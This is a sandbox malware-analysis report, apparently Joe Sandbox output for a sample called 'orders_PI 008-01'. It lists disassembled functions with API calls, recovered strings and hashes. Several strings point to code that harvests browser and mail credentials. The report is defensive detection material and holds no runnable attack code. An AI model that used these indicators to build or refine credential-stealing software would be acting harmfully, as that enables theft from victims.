                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Message$MenuPostSendStringmemset
                                        • String ID:
                                        • API String ID: 3798638045-0
                                        • Opcode ID: 5260d67871d0b89722168e7d498f4e0a86ca69d9cc9d8627ca4b69d99b7a7acc
                                        • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                        • Opcode Fuzzy Hash: 5260d67871d0b89722168e7d498f4e0a86ca69d9cc9d8627ca4b69d99b7a7acc
                                        • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                        Function 0040B5E5 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000), ref: 00409E0E
                                          • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00409ED5
                                        • strlen.MSVCRT ref: 0040B60B
                                        • atoi.MSVCRT(?,00000000,?,75570A60,?,00000000), ref: 0040B619
                                        • _mbsicmp.MSVCRT ref: 0040B66C
                                        • _mbsicmp.MSVCRT ref: 0040B67F
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _mbsicmp$??2@??3@atoistrlen
                                        • String ID:
                                        • API String ID: 4107816708-0
                                        • Opcode ID: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                        • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                        • Opcode Fuzzy Hash: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                        • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                        Function 004113B2 Relevance: 6.1, APIs: 4, Instructions: 85stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                        • _gmtime64.MSVCRT ref: 00411437
                                        • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                        • strftime.MSVCRT ref: 00411476
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                        • String ID:
                                        • API String ID: 1886415126-0
                                        • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                        • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                        • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                        • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                        Function 00444462 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: strlen
                                        • String ID: >$>$>
                                        • API String ID: 39653677-3911187716
                                        • Opcode ID: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                        • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                        • Opcode Fuzzy Hash: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                        • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                        Function 0040D205 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                        • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                        • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                        • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: @
                                        • API String ID: 3510742995-2766056989
                                        • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                        • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                        • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                        • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                        Function 0040E1C8 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _strcmpi
                                        • String ID: C@$mail.identity
                                        • API String ID: 1439213657-721921413
                                        • Opcode ID: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                        • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                        • Opcode Fuzzy Hash: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                        • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                        Function 00406620 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00406640
                                          • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                          • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                          • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                        • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                        • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$memset$memcmp
                                        • String ID: Ul@
                                        • API String ID: 270934217-715280498
                                        • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                        • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                        • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                        • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                        Function 0040B903 Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                          • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,75570A60), ref: 00408EBE
                                        • sprintf.MSVCRT ref: 0040B929
                                        • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                          • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408E31
                                          • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                        • sprintf.MSVCRT ref: 0040B953
                                        • _mbscat.MSVCRT ref: 0040B966
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                        • String ID:
                                        • API String ID: 203655857-0
                                        • Opcode ID: 2ce3bf29076009c9b33a0812678365ae05abee5bebdb1db4c2a4298f5e83ad1b
                                        • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                        • Opcode Fuzzy Hash: 2ce3bf29076009c9b33a0812678365ae05abee5bebdb1db4c2a4298f5e83ad1b
                                        • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                        Function 0040ADC5 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040ADE8
                                        • memset.MSVCRT ref: 0040ADFE
                                          • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                          • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                        • sprintf.MSVCRT ref: 0040AE28
                                          • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                          • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,`Wu,00000000,?,?,0040A7BE,00000001,0044CBC0,75570A60), ref: 00406D4D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                        • String ID: </%s>
                                        • API String ID: 3699762281-259020660
                                        • Opcode ID: 8cab70514fe5aa4f21475794247a492732dcbe2e03c6ed67b3b3c257d80e3403
                                        • Instruction ID: ff04cb2e9b10d1c503b051559ee948e99af9d8289afd69eb184e92e88926625d
                                        • Opcode Fuzzy Hash: 8cab70514fe5aa4f21475794247a492732dcbe2e03c6ed67b3b3c257d80e3403
                                        • Instruction Fuzzy Hash: CF01F97290012967E721A619CC46FDEB76C9F54304F0500FAB50DF3142DA74AA448BA5
                                        Function 0041865B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                        Strings
                                        • recovered %d pages from %s, xrefs: 004188B4
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                        • String ID: recovered %d pages from %s
                                        • API String ID: 985450955-1623757624
                                        • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                        • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                        • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                        • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                        Function 004021FF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _ultoasprintf
                                        • String ID: %s %s %s
                                        • API String ID: 432394123-3850900253
                                        • Opcode ID: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                        • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                        • Opcode Fuzzy Hash: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                        • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                        Function 00409070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadMenuA.USER32(00000000), ref: 00409078
                                        • sprintf.MSVCRT ref: 0040909B
                                          • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                          • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                          • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                          • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                          • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                          • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                          • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                        • String ID: menu_%d
                                        • API String ID: 1129539653-2417748251
                                        • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                        • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                        • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                        • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                        Function 004116E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        • failed memory resize %u to %u bytes, xrefs: 00411706
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _msizerealloc
                                        • String ID: failed memory resize %u to %u bytes
                                        • API String ID: 2713192863-2134078882
                                        • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                        • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                        • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                        • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                        Function 004097FF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104,?), ref: 00406FA1
                                        • strrchr.MSVCRT ref: 00409808
                                        • _mbscat.MSVCRT ref: 0040981D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FileModuleName_mbscatstrrchr
                                        • String ID: _lng.ini
                                        • API String ID: 3334749609-1948609170
                                        • Opcode ID: ef02889c57b29374549b5c1aa1c0392ef6eb8eedf2cf02011a8dcbac94fb250b
                                        • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                        • Opcode Fuzzy Hash: ef02889c57b29374549b5c1aa1c0392ef6eb8eedf2cf02011a8dcbac94fb250b
                                        • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                        Function 00406D33 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • strlen.MSVCRT ref: 00406D40
                                        • WriteFile.KERNEL32(0044CBC0,00000001,00000000,`Wu,00000000,?,?,0040A7BE,00000001,0044CBC0,75570A60), ref: 00406D4D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FileWritestrlen
                                        • String ID: `Wu
                                        • API String ID: 672350951-3261129705
                                        • Opcode ID: cac463ce90e89d513bccef4edf21d7ab06550908c64ce4a29a21b7a7f24cdced
                                        • Instruction ID: a1daa8ef38dceb764141083f29503c44cd6ba7bd5444bb4604710c8dfa57da9a
                                        • Opcode Fuzzy Hash: cac463ce90e89d513bccef4edf21d7ab06550908c64ce4a29a21b7a7f24cdced
                                        • Instruction Fuzzy Hash: 81D0C97500010CBFEF019F41EC46EA93B6DEB05258F108025F90488061DBB1EE109B65
                                        Function 004070E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                                        Download Yara Rule
                                        APIs
                                        • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                          • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                          • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                        • _mbscat.MSVCRT ref: 004070FA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _mbscat$_mbscpystrlen
                                        • String ID: sqlite3.dll
                                        • API String ID: 1983510840-1155512374
                                        • Opcode ID: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                        • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                        • Opcode Fuzzy Hash: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                        • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                        Function 004073CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowLongA.USER32(?,000000EC), ref: 004073D0
                                        • SetWindowLongA.USER32(00000001,000000EC,00000000), ref: 004073E2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: LongWindow
                                        • String ID: MZ@
                                        • API String ID: 1378638983-2978689999
                                        • Opcode ID: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                        • Instruction ID: af96c772fb3515a1af29397562e0ba089e4702b068c0c421cdc779d54beb7f6e
                                        • Opcode Fuzzy Hash: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                        • Instruction Fuzzy Hash: 81C0123015D0166BCF101B24DC04E167E54B782321F208770B062E00F0C7704400A504
                                        Function 004033B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: PrivateProfileString
                                        • String ID: A4@$Server Details
                                        • API String ID: 1096422788-4071850762
                                        • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                        • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                        • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                        • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                        Function 0042C821 Relevance: 5.2, APIs: 4, Instructions: 185COMMON
                                        Download Yara Rule
                                        APIs
                                        • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                        • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                        • memset.MSVCRT ref: 0042C932
                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$memset
                                        • String ID:
                                        • API String ID: 438689982-0
                                        • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                        • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                        • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                        • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                        Function 0040848B Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • strlen.MSVCRT ref: 0040849A
                                        • memset.MSVCRT ref: 004084D2
                                        • memcpy.MSVCRT(?,00000000,?,?,?,?,7568EB20,?,00000000), ref: 0040858F
                                        • LocalFree.KERNEL32(00000000,?,?,?,?,7568EB20,?,00000000), ref: 004085BA
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FreeLocalmemcpymemsetstrlen
                                        • String ID:
                                        • API String ID: 3110682361-0
                                        • Opcode ID: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                        • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
